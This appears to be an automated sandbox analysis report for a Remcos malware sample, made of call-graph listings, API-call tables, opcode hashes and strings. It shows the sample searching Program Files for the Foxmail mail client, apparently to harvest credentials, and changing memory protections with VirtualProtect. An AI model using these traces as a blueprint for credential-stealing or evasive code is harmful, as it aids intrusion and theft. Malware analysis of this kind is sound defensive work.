GetProcAddress 34113->34116 34115->34112 34115->34113 34125 2de95ce1 34115->34125 34117 2de95cb1 __crt_fast_encode_pointer 34116->34117 34117->34112 34119 2de92ae3 34118->34119 34120 2de92ae5 IsProcessorFeaturePresent 34118->34120 34119->34107 34122 2de92b58 34120->34122 34132 2de92b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34122->34132 34124 2de92c3b 34124->34107 34126 2de95d02 LoadLibraryExW 34125->34126 34131 2de95cf7 34125->34131 34127 2de95d1f GetLastError 34126->34127 34128 2de95d37 34126->34128 34127->34128 34129 2de95d2a LoadLibraryExW 34127->34129 34130 2de95d4e FreeLibrary 34128->34130 34128->34131 34129->34128 34130->34131 34131->34115 34132->34124 34133 2de91f3f 34134 2de91f4b ___DestructExceptionObject 34133->34134 34151 2de9247c 34134->34151 34136 2de91f57 ___scrt_is_nonwritable_in_current_image 34137 2de91f52 34137->34136 34138 2de91f7c 34137->34138 34139 2de92041 34137->34139 34162 2de923de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 34138->34162 34167 2de92639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 34139->34167 34142 2de92048 34143 2de91f8b __RTC_Initialize 34143->34136 34163 2de922fc RtlInitializeSListHead 34143->34163 34145 2de91f99 ___scrt_initialize_default_local_stdio_options 34164 2de946c5 5 API calls _ValidateLocalCookies 34145->34164 34147 2de91fad 34147->34136 34165 2de923b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 34147->34165 34149 2de91fb8 34149->34136 34166 2de94669 5 API calls _ValidateLocalCookies 34149->34166 34152 2de92485 34151->34152 34168 2de92933 IsProcessorFeaturePresent 34152->34168 34154 2de92491 34169 2de934ea 34154->34169 34156 2de9249a 34156->34137 34157 2de92496 34157->34156 34178 2de953c8 34157->34178 34160 2de924b1 34160->34137 34162->34143 34163->34145 34164->34147 34165->34149 34166->34136 34167->34142 34168->34154 34170 2de934ef ___vcrt_initialize_winapi_thunks 34169->34170 34182 2de93936 7 API calls 2 library calls 34170->34182 34172 2de934f9 34173 2de934fd 34172->34173 34183 2de938e8 34172->34183 34173->34157 34175 2de93505 34176 2de93510 34175->34176 34191 2de93972 RtlDeleteCriticalSection 34175->34191 34176->34157 34213 2de97457 34178->34213 34181 2de93529 8 API calls 3 library calls 34181->34156 34182->34172 34192 2de93af1 34183->34192 34187 2de9390b 34188 2de93918 34187->34188 34198 2de9391b 6 API calls ___vcrt_FlsFree 34187->34198 34188->34175 34190 2de938fd 34190->34175 34191->34173 34199 2de93a82 34192->34199 34194 2de93b0b 34195 2de93b24 TlsAlloc 34194->34195 34196 2de938f2 34194->34196 34196->34190 34197 2de93ba2 6 API calls try_get_function 34196->34197 34197->34187 34198->34190 34200 2de93aaa 34199->34200 34201 2de93aa6 __crt_fast_encode_pointer 34199->34201 34200->34201 34206 2de939be 34200->34206 34201->34194 34204 2de93ac4 GetProcAddress 34204->34201 34205 2de93ad4 __crt_fast_encode_pointer 34204->34205 34205->34201 34211 2de939cd try_get_first_available_module 34206->34211 34207 2de93a77 34207->34201 34207->34204 34208 2de939ea LoadLibraryExW 34209 2de93a05 GetLastError 34208->34209 34208->34211 34209->34211 34210 2de93a60 FreeLibrary 34210->34211 34211->34207 34211->34208 34211->34210 34212 2de93a38 LoadLibraryExW 34211->34212 34212->34211 34214 2de97470 34213->34214 34215 2de97474 34213->34215 34216 2de92ada _ValidateLocalCookies 5 API calls 34214->34216 34215->34214 34219 2de9731f 34215->34219 34217 2de924a3 34216->34217 34217->34160 34217->34181 34221 2de97326 34219->34221 34220 2de97369 GetStdHandle 34220->34221 34221->34220 34222 2de973d1 34221->34222 34223 2de9737c GetFileType 34221->34223 34222->34215 34223->34221 34224 2de94ed7 34235 2de96d60 34224->34235 34229 2de94ef4 34269 2de9571e 20 API calls _free 34229->34269 34232 2de94f29 34233 2de94eff 34268 2de9571e 20 API calls _free 34233->34268 34236 2de96d69 34235->34236 34237 2de94ee9 34235->34237 34270 2de96c5f 34236->34270 34239 2de97153 GetEnvironmentStringsW 34237->34239 34240 2de9716a 34239->34240 34241 2de971bd 34239->34241 34242 2de97170 WideCharToMultiByte 34240->34242 34243 2de94eee 34241->34243 34244 2de971c6 FreeEnvironmentStringsW 34241->34244 34242->34241 34245 2de9718c 34242->34245 34243->34229 34251 2de94f2f 34243->34251 34244->34243 34246 2de956d0 21 API calls 34245->34246 34247 2de97192 34246->34247 34248 2de97199 WideCharToMultiByte 34247->34248 34249 2de971af 34247->34249 34248->34249 34447 2de9571e 20 API calls _free 34249->34447 34252 2de94f44 34251->34252 34253 2de9637b _free 20 API calls 34252->34253 34263 2de94f6b 34253->34263 34254 2de94fcf 34452 2de9571e 20 API calls _free 34254->34452 34256 2de94fe9 34256->34233 34257 2de9637b _free 20 API calls 34257->34263 34258 2de94fd1 34450 2de95000 20 API calls _free 34258->34450 34261 2de94fd7 34451 2de9571e 20 API calls _free 34261->34451 34262 2de94ff3 34453 2de962bc 11 API calls _abort 34262->34453 34263->34254 34263->34257 34263->34258 34263->34262 34448 2de9544d 26 API calls 2 library calls 34263->34448 34449 2de9571e 20 API calls _free 34263->34449 34267 2de94fff 34268->34229 34269->34232 34290 2de95af6 GetLastError 34270->34290 34272 2de96c6c 34310 2de96d7e 34272->34310 34274 2de96c74 34319 2de969f3 34274->34319 34277 2de96c8b 34277->34237 34283 2de96cc9 34343 2de96368 20 API calls _free 34283->34343 34285 2de96cce 34344 2de9571e 20 API calls _free 34285->34344 34286 2de96ce6 34288 2de96d12 34286->34288 34345 2de9571e 20 API calls _free 34286->34345 34288->34285 34346 2de968c9 26 API calls 34288->34346 34291 2de95b0c 34290->34291 34294 2de95b12 34290->34294 34347 2de95e08 11 API calls 2 library calls 34291->34347 34297 2de95b61 SetLastError 34294->34297 34348 2de9637b 34294->34348 34296 2de95b2c 34355 2de9571e 20 API calls _free 34296->34355 34297->34272 34300 2de95b41 34300->34296 34302 2de95b48 34300->34302 34301 2de95b32 34303 2de95b6d SetLastError 34301->34303 34357 2de9593c 20 API calls _free 34302->34357 34359 2de955a8 38 API calls _abort 34303->34359 34305 2de95b53 34358 2de9571e 20 API calls _free 34305->34358 34309 2de95b5a 34309->34297 34309->34303 34311 2de96d8a ___DestructExceptionObject 34310->34311 34312 2de95af6 _abort 38 API calls 34311->34312 34317 2de96d94 34312->34317 34314 2de96e18 _abort 34314->34274 34317->34314 34362 2de955a8 38 API calls _abort 34317->34362 34363 2de95671 RtlEnterCriticalSection 34317->34363 34364 2de9571e 20 API calls _free 34317->34364 34365 2de96e0f RtlLeaveCriticalSection _abort 34317->34365 34366 2de954a7 34319->34366 34322 2de96a14 GetOEMCP 34324 2de96a3d 34322->34324 34323 2de96a26 34323->34324 34325 2de96a2b GetACP 34323->34325 34324->34277 34326 2de956d0 34324->34326 34325->34324 34327 2de9570e 34326->34327 34331 2de956de _free 34326->34331 34377 2de96368 20 API calls _free 34327->34377 34329 2de956f9 RtlAllocateHeap 34330 2de9570c 34329->34330 34329->34331 34330->34285 34333 2de96e20 34330->34333 34331->34327 34331->34329 34376 2de9474f 7 API calls 2 library calls 34331->34376 34334 2de969f3 40 API calls 34333->34334 34335 2de96e3f 34334->34335 34338 2de96e90 IsValidCodePage 34335->34338 34340 2de96e46 34335->34340 34342 2de96eb5 ___scrt_fastfail 34335->34342 34336 2de92ada _ValidateLocalCookies 5 API calls 34337 2de96cc1 34336->34337 34337->34283 34337->34286 34339 2de96ea2 GetCPInfo 34338->34339 34338->34340 34339->34340 34339->34342 34340->34336 34378 2de96acb GetCPInfo 34342->34378 34343->34285 34344->34277 34345->34288 34346->34285 34347->34294 34353 2de96388 _free 34348->34353 34349 2de963c8 34361 2de96368 20 API calls _free 34349->34361 34350 2de963b3 RtlAllocateHeap 34352 2de95b24 34350->34352 34350->34353 34352->34296 34356 2de95e5e 11 API calls 2 library calls 34352->34356 34353->34349 34353->34350 34360 2de9474f 7 API calls 2 library calls 34353->34360 34355->34301 34356->34300 34357->34305 34358->34309 34360->34353 34361->34352 34363->34317 34364->34317 34365->34317 34367 2de954ba 34366->34367 34368 2de954c4 34366->34368 34367->34322 34367->34323 34368->34367 34369 2de95af6 _abort 38 API calls 34368->34369 34370 2de954e5 34369->34370 34374 2de97a00 38 API calls __fassign 34370->34374 34372 2de954fe 34375 2de97a2d 38 API calls __fassign 34372->34375 34374->34372 34375->34367 34376->34331 34377->34330 34384 2de96b05 34378->34384 34387 2de96baf 34378->34387 34381 2de92ada _ValidateLocalCookies 5 API calls 34383 2de96c5b 34381->34383 34383->34340 34388 2de986e4 34384->34388 34386 2de98a3e 43 API calls 34386->34387 34387->34381 34389 2de954a7 __fassign 38 API calls 34388->34389 34390 2de98704 MultiByteToWideChar 34389->34390 34392 2de987da 34390->34392 34393 2de98742 34390->34393 34394 2de92ada _ValidateLocalCookies 5 API calls 34392->34394 34395 2de956d0 21 API calls 34393->34395 34398 2de98763 ___scrt_fastfail 34393->34398 34396 2de96b66 34394->34396 34395->34398 34402 2de98a3e 34396->34402 34397 2de987d4 34407 2de98801 20 API calls _free 34397->34407 34398->34397 34400 2de987a8 MultiByteToWideChar 34398->34400 34400->34397 34401 2de987c4 GetStringTypeW 34400->34401 34401->34397 34403 2de954a7 __fassign 38 API calls 34402->34403 34404 2de98a51 34403->34404 34408 2de98821 34404->34408 34407->34392 34410 2de9883c 34408->34410 34409 2de98862 MultiByteToWideChar 34411 2de98a16 34409->34411 34412 2de9888c 34409->34412 34410->34409 34413 2de92ada _ValidateLocalCookies 5 API calls 34411->34413 34415 2de956d0 21 API calls 34412->34415 34418 2de988ad 34412->34418 34414 2de96b87 34413->34414 34414->34386 34415->34418 34416 2de98962 34444 2de98801 20 API calls _free 34416->34444 34417 2de988f6 MultiByteToWideChar 34417->34416 34419 2de9890f 34417->34419 34418->34416 34418->34417 34435 2de95f19 34419->34435 34423 2de98939 34423->34416 34425 2de95f19 11 API calls 34423->34425 34424 2de98971 34427 2de956d0 21 API calls 34424->34427 34430 2de98992 34424->34430 34425->34416 34426 2de98a07 34443 2de98801 20 API calls _free 34426->34443 34427->34430 34428 2de95f19 11 API calls 34431 2de989e6 34428->34431 34430->34426 34430->34428 34431->34426 34432 2de989f5 WideCharToMultiByte 34431->34432 34432->34426 34433 2de98a35 34432->34433 34445 2de98801 20 API calls _free 34433->34445 34436 2de95c45 _free 5 API calls 34435->34436 34437 2de95f40 34436->34437 34440 2de95f49 34437->34440 34446 2de95fa1 10 API calls 2 library calls 34437->34446 34439 2de95f89 LCMapStringW 34439->34440 34441 2de92ada _ValidateLocalCookies 5 API calls 34440->34441 34442 2de95f9b 34441->34442 34442->34416 34442->34423 34442->34424 34443->34416 34444->34411 34445->34416 34446->34439 34447->34241 34448->34263 34449->34263 34450->34261 34451->34254 34452->34256 34453->34267 34454 2de9c7a7 34455 2de9c7be 34454->34455 34459 2de9c82c 34454->34459 34455->34459 34466 2de9c7e6 GetModuleHandleA 34455->34466 34457 2de9c872 34458 2de9c835 GetModuleHandleA 34460 2de9c83f 34458->34460 34459->34457 34459->34458 34459->34460 34460->34459 34462 2de9c85f GetProcAddress 34460->34462 34461 2de9c7dd 34461->34459 34461->34460 34463 2de9c800 GetProcAddress 34461->34463 34462->34459 34463->34459 34464 2de9c80d VirtualProtect 34463->34464 34464->34459 34465 2de9c81c VirtualProtect 34464->34465 34465->34459 34467 2de9c7ef 34466->34467 34473 2de9c82c 34466->34473 34478 2de9c803 GetProcAddress 34467->34478 34469 2de9c872 34470 2de9c835 GetModuleHandleA 34476 2de9c83f 34470->34476 34471 2de9c7f4 34472 2de9c800 GetProcAddress 34471->34472 34471->34473 34472->34473 34474 2de9c80d VirtualProtect 34472->34474 34473->34469 34473->34470 34473->34476 34474->34473 34475 2de9c81c VirtualProtect 34474->34475 34475->34473 34476->34473 34477 2de9c85f GetProcAddress 34476->34477 34477->34473 34479 2de9c82c 34478->34479 34480 2de9c80d VirtualProtect 34478->34480 34482 2de9c872 34479->34482 34483 2de9c835 GetModuleHandleA 34479->34483 34480->34479 34481 2de9c81c VirtualProtect 34480->34481 34481->34479 34485 2de9c83f 34483->34485 34484 2de9c85f GetProcAddress 34484->34485 34485->34479 34485->34484

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 2DE910F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 9221 2de910f1-2de91166 call 2de92c40 * 2 lstrlenW call 2de92c40 lstrcatW lstrlenW 9228 2de91168-2de91172 lstrlenW 9221->9228 9229 2de91177-2de9119e lstrlenW FindFirstFileW 9221->9229 9228->9229 9230 2de911e1-2de911e9 9229->9230 9231 2de911a0-2de911a8 9229->9231 9232 2de911aa-2de911c4 call 2de91000 9231->9232 9233 2de911c7-2de911d8 FindNextFileW 9231->9233 9232->9233 9233->9231 9235 2de911da-2de911db FindClose 9233->9235 9235->9230
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 2DE91137
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE91151
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9115C
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9116D
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9117C
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 2DE91193
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 2DE911D0
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 2DE911DB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1083526818-0
                                                                                                                                                                                    • Opcode ID: b8cf97335b8be16919e40ab8951f4655eaf1919c5521bfdcd9ab47ff86feebbe
                                                                                                                                                                                    • Instruction ID: c80f7677ef3a144dca01ddde950f8720af28667260cf40e8c369f27613916358
                                                                                                                                                                                    • Opcode Fuzzy Hash: b8cf97335b8be16919e40ab8951f4655eaf1919c5521bfdcd9ab47ff86feebbe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B2191729053186BD720EA64DC48FDB7BECEF84714F00092ABA59E3190EB34E615C796
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03347966 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24memorynativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11265 3347966-33479a5 call 3336650 call 3336658 NtAllocateVirtualMemory
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0334799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0334796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03347970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 2167126740-2206134580
                                                                                                                                                                                    • Opcode ID: 3cb22abd151663f7fcb56690a6c86d5161e28fc0ae305248cedc9a8ef0837d97
                                                                                                                                                                                    • Instruction ID: 56403a89d2695cdc494c09b3f5980aea56866e19c7e5a13205c16283f7ac3ea9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cb22abd151663f7fcb56690a6c86d5161e28fc0ae305248cedc9a8ef0837d97
                                                                                                                                                                                    • Instruction Fuzzy Hash: B3E075B664030CBFDB01EFA8D8C6EDB77ECAB09650F008412BA28D7101D771E9508BA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03347968 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23memorynativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11271 3347968-33479a5 call 3336650 call 3336658 NtAllocateVirtualMemory
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0334799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0334796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03347970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 2167126740-2206134580
                                                                                                                                                                                    • Opcode ID: 30005567caee2353f9be58cd7dbf8cab68ce57f781d05471e361151de9e9cbe0
                                                                                                                                                                                    • Instruction ID: 34e4930ccd69337bc1bc55db17add78a17d52505486bb49959c7c8b1de88877d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30005567caee2353f9be58cd7dbf8cab68ce57f781d05471e361151de9e9cbe0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E075B654030CBFDB01EFA8D8C6EDB77ACAB09650F008412BA28D7101D771E5508BA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE912EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 2DE91434
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 2DE91137
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrcatW.KERNEL32(?,?), ref: 2DE91151
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9115C
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9116D
                                                                                                                                                                                      • Part of subcall function 2DE910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9117C
                                                                                                                                                                                      • Part of subcall function 2DE910F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 2DE91193
                                                                                                                                                                                      • Part of subcall function 2DE910F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 2DE911D0
                                                                                                                                                                                      • Part of subcall function 2DE910F1: FindClose.KERNEL32(00000000), ref: 2DE911DB
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 2DE914C5
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 2DE914E0
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE9150F
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE91521
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE91547
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE91553
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE91579
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE91585
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 2DE915AB
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 2DE915B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                                    • Opcode ID: b8dbfafd89e04f66c995155b33d4724e4e9911d4d5f2b899c16d21786f0654c9
                                                                                                                                                                                    • Instruction ID: 2de0026cfc59bc5de0dae15c2a36b396c8a4e2b6595285caf43092e57c493bc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: b8dbfafd89e04f66c995155b33d4724e4e9911d4d5f2b899c16d21786f0654c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1681A171A41358A9DB20DBA0DC85FEF7379EF84710F00059AF609FB291EE715A84CB95
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE98821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11100 2de98821-2de9883a 11101 2de9883c-2de9884c call 2de99341 11100->11101 11102 2de98850-2de98855 11100->11102 11101->11102 11110 2de9884e 11101->11110 11104 2de98862-2de98886 MultiByteToWideChar 11102->11104 11105 2de98857-2de9885f 11102->11105 11107 2de98a19-2de98a2c call 2de92ada 11104->11107 11108 2de9888c-2de98898 11104->11108 11105->11104 11111 2de9889a-2de988ab 11108->11111 11112 2de988ec 11108->11112 11110->11102 11113 2de988ca-2de988db call 2de956d0 11111->11113 11114 2de988ad-2de988bc call 2de9bf20 11111->11114 11116 2de988ee-2de988f0 11112->11116 11119 2de98a0e 11113->11119 11126 2de988e1 11113->11126 11114->11119 11125 2de988c2-2de988c8 11114->11125 11116->11119 11120 2de988f6-2de98909 MultiByteToWideChar 11116->11120 11124 2de98a10-2de98a17 call 2de98801 11119->11124 11120->11119 11123 2de9890f-2de98921 call 2de95f19 11120->11123 11130 2de98926-2de9892a 11123->11130 11124->11107 11129 2de988e7-2de988ea 11125->11129 11126->11129 11129->11116 11130->11119 11132 2de98930-2de98937 11130->11132 11133 2de98939-2de9893e 11132->11133 11134 2de98971-2de9897d 11132->11134 11133->11124 11135 2de98944-2de98946 11133->11135 11136 2de989c9 11134->11136 11137 2de9897f-2de98990 11134->11137 11135->11119 11138 2de9894c-2de98966 call 2de95f19 11135->11138 11139 2de989cb-2de989cd 11136->11139 11140 2de989ab-2de989bc call 2de956d0 11137->11140 11141 2de98992-2de989a1 call 2de9bf20 11137->11141 11138->11124 11152 2de9896c 11138->11152 11143 2de989cf-2de989e8 call 2de95f19 11139->11143 11144 2de98a07-2de98a0d call 2de98801 11139->11144 11140->11144 11156 2de989be 11140->11156 11141->11144 11155 2de989a3-2de989a9 11141->11155 11143->11144 11158 2de989ea-2de989f1 11143->11158 11144->11119 11152->11119 11157 2de989c4-2de989c7 11155->11157 11156->11157 11157->11139 11159 2de98a2d-2de98a33 11158->11159 11160 2de989f3-2de989f4 11158->11160 11161 2de989f5-2de98a05 WideCharToMultiByte 11159->11161 11160->11161 11161->11144 11162 2de98a35-2de98a3c call 2de98801 11161->11162 11162->11124
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,2DE96FFD,00000000,?,?,?,2DE98A72,?,?,00000100), ref: 2DE9887B
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,2DE98A72,?,?,00000100,5EFC4D8B,?,?), ref: 2DE98901
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 2DE989FB
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE98A08
                                                                                                                                                                                      • Part of subcall function 2DE956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 2DE95702
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE98A11
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE98A36
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                    • Opcode ID: 02636d80c7520d4f89223ef4ac2273380b03db81c3226823d9907812d9fe4d30
                                                                                                                                                                                    • Instruction ID: 898e55964adbb238bdac242c3da2e0d09b10b0972d251ea2cb68b7a51d667d78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02636d80c7520d4f89223ef4ac2273380b03db81c3226823d9907812d9fe4d30
                                                                                                                                                                                    • Instruction Fuzzy Hash: 365104B2612616ABDB258E60CCC0EFF77A9EB41654F114629FE28F6160EF74DC50C6A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE9C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11165 2de9c7e6-2de9c7ed GetModuleHandleA 11166 2de9c82d 11165->11166 11167 2de9c7ef-2de9c7fe call 2de9c803 11165->11167 11168 2de9c82f-2de9c833 11166->11168 11177 2de9c800-2de9c80b GetProcAddress 11167->11177 11178 2de9c865 11167->11178 11170 2de9c872 call 2de9c877 11168->11170 11171 2de9c835-2de9c83d GetModuleHandleA 11168->11171 11174 2de9c83f-2de9c847 11171->11174 11174->11174 11176 2de9c849-2de9c84c 11174->11176 11176->11168 11179 2de9c84e-2de9c850 11176->11179 11177->11166 11180 2de9c80d-2de9c81a VirtualProtect 11177->11180 11181 2de9c866-2de9c86e 11178->11181 11184 2de9c852-2de9c854 11179->11184 11185 2de9c856-2de9c85e 11179->11185 11182 2de9c82c 11180->11182 11183 2de9c81c-2de9c82a VirtualProtect 11180->11183 11189 2de9c870 11181->11189 11182->11166 11183->11182 11188 2de9c85f-2de9c860 GetProcAddress 11184->11188 11185->11188 11188->11178 11189->11176
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(2DE9C7DD), ref: 2DE9C7E6
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,2DE9C7DD), ref: 2DE9C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2DE9C860
